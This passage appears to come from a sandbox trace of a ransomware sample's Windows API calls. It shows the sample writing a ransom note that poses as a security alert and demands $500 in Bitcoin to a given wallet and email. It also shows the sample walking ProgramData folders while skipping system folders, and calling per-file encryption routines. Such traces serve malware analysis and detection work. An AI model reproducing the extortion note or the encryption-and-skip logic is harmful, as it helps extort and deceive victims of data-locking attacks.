secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.787] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0064.788] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.788] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0064.788] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.788] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0064.789] CloseHandle (hObject=0xb4) returned 1 [0064.789] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0064.789] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0064.789] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\RESTORE_FILES.txt") returned 46 [0064.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\arm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0064.789] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.789] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0064.790] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.790] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0064.790] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.790] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0064.790] CloseHandle (hObject=0xa4) returned 1 [0064.791] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0064.791] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0064.791] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\RESTORE_FILES.txt") returned 42 [0064.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0064.792] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.792] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0065.035] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.035] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0065.035] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.035] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0065.035] CloseHandle (hObject=0xac) returned 1 [0065.035] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0065.035] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0065.036] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0065.036] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data") returned 35 [0065.036] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0065.036] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0065.036] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data\\*") returned 37 [0065.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.036] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0065.036] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0065.036] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop") returned 26 [0065.036] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0065.036] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0065.036] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop\\*") returned 28 [0065.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.036] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0065.036] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0065.036] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents") returned 28 [0065.037] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0065.037] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0065.037] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents\\*") returned 30 [0065.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.037] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0065.037] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 [0065.037] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Favorites") returned 28 [0065.037] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0065.037] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0065.037] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Favorites\\*") returned 30 [0065.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0xffffffff [0065.037] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0065.037] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0065.037] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft") returned 28 [0065.037] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0065.037] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0065.037] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\*") returned 30 [0065.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0065.038] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.038] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.038] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.038] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.038] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.038] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\.") returned 30 [0065.038] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.038] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0065.038] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0065.038] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0065.038] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0065.038] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\." (normalized: "c:\\programdata\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.038] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.038] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.038] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.038] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.038] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.038] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.038] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\..") returned 31 [0065.038] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.039] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.039] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0065.039] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0065.039] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0065.039] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0065.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\.." (normalized: "c:\\programdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.039] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="Windows") returned -1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="Program Files") returned -1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="Program Files (x86)") returned -1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="$Recycle.bin") returned 1 [0065.039] lstrcmpiW (lpString1="Assistance", lpString2="System Volume Information") returned -1 [0065.039] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance") returned 39 [0065.039] lstrcmpW (lpString1="Assistance", lpString2=".") returned 1 [0065.039] lstrcmpW (lpString1="Assistance", lpString2="..") returned 1 [0065.039] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*") returned 41 [0065.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0065.039] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.039] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.039] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.039] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.039] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\.") returned 41 [0065.040] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.040] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.040] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.040] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.040] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.040] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.040] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\..") returned 42 [0065.040] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.040] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.040] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="Windows") returned -1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="Program Files") returned -1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="Program Files (x86)") returned -1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="$Recycle.bin") returned 1 [0065.040] lstrcmpiW (lpString1="Client", lpString2="System Volume Information") returned -1 [0065.040] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client") returned 46 [0065.040] lstrcmpW (lpString1="Client", lpString2=".") returned 1 [0065.040] lstrcmpW (lpString1="Client", lpString2="..") returned 1 [0065.040] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*") returned 48 [0065.040] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.040] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.040] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.040] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.040] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.040] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\.") returned 48 [0065.041] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.041] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.041] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.041] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.041] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.041] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.041] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\..") returned 49 [0065.041] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.041] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.041] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="Windows") returned -1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="Program Files") returned -1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="Program Files (x86)") returned -1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="$Recycle.bin") returned 1 [0065.041] lstrcmpiW (lpString1="1.0", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0") returned 50 [0065.041] lstrcmpW (lpString1="1.0", lpString2=".") returned 1 [0065.041] lstrcmpW (lpString1="1.0", lpString2="..") returned 1 [0065.041] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*") returned 52 [0065.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.041] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.041] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.041] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.041] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.041] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.041] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\.") returned 52 [0065.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.042] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.042] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.042] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.042] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.042] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.042] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.042] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\..") returned 53 [0065.042] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.042] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0065.042] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0065.042] wnsprintfW (in: 